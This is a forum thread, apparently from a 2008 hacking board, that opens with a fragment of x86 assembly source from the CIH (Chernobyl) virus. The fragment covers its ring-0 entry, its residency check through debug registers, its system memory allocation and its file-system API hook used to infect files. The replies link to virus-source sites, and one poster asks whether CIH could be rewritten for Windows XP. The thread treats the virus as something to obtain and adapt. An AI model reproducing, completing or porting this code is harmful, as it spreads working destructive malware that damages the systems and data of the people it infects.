; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2            =    MyExceptionHook
            jz    InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

            mov    ecx, dr0
            jecxz    AllocateSystemMemoryPage
            add    dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init:
            mov    [ebx-04h], bp;
            shr    ebp, 16    ; Restore Exception
            mov    [ebx+02h], bp;
            iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

            mov    dr0, ebx; Set the Mark of My Virus Exist in System
            push    00000000fh;
            push    ecx    ;
            push    0ffffffffh;
            push    ecx    ;
            push    ecx    ;
            push    ecx    ;
            push    000000001h;
            push    000000002h;
            int    20h    ; VMMCALL _PageAllocate
_PageAllocate        =    $    ;
            dd    00010053h; Use EAX, ECX, EDX, and flags
            add    esp, 08h*04h
            xchg    edi, eax; EDI = SystemMemory Start Address
            lea    eax, MyVirusStart-@2[esi]
            iretd; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook:

            lea    eax, FileSystemApiHook-@6[edi]

            push    eax ;
            int    20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $
            dd      00400067h; Use EAX, ECX, EDX, and flags
            mov    dr0, eax; Save OldFileSystemApiHook Address
            pop    eax; EAX = FileSystemApiHook Address
        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
            mov    ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
            mov    edx, [ecx]
            mov    OldInstallFileSystemApiHook-@3[eax], edx
        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
            lea    eax, InstallFileSystemApiHook-@3[eax]
            mov    [ecx], eax
            cli
            jmp    ExitRing0Init

; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************

CodeSizeOfMergeVirusCodeSection        =    offset $

; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************

InstallFileSystemApiHook:
            push    ebx
            call    @4;
@4:                ;
            pop    ebx; mov ebx, offset FileSystemApiHook
            add    ebx, FileSystemApiHook-@4;
            push    ebx
            int    20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook    =    $
            dd      00400068h; Use EAX, ECX, EDX, and flags
            pop    eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link Client FileSystemApiHook
            push    dword ptr [esp+8]
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx
            push    eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link My FileSystemApiHook
            push    ebx
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx
            mov    dr0, eax; Adjust OldFileSystemApiHook Address
            pop    eax
            pop    ebx
            ret
 

  #7  
29.04.2008, 20:20
z01b
Regular
Registered: 05.01.2007
Posts: 508
Reputation: 1393

http://forum.prologic.ws/index.php?showtopic=3318
 

  #8  
29.04.2008, 20:26
Pavlik
Newbie
Registered: 11.04.2008
Posts: 2
Reputation: 0

Quote:
Originally posted by z01b
http://forum.prologic.ws/index.php?showtopic=3318
The source there is incomplete!
1) Mine is much longer!
2) It even ends with a ret instruction, which means returning to the data before the start of this function, and asm doesn't end like that!
 

  #9  
29.04.2008, 20:34
xcedz
ANTICHAT initiate
Registered: 14.01.2008
Posts: 1,165
Reputation: 3099

look here

http://vx.netlux.org/
 

  #10  
29.04.2008, 20:39
Pavlik
Newbie
Registered: 11.04.2008
Posts: 2
Reputation: 0

xcedz, thanks of course, but what I was actually asking is what can be done with it! Can CIH be rewritten for XP?
 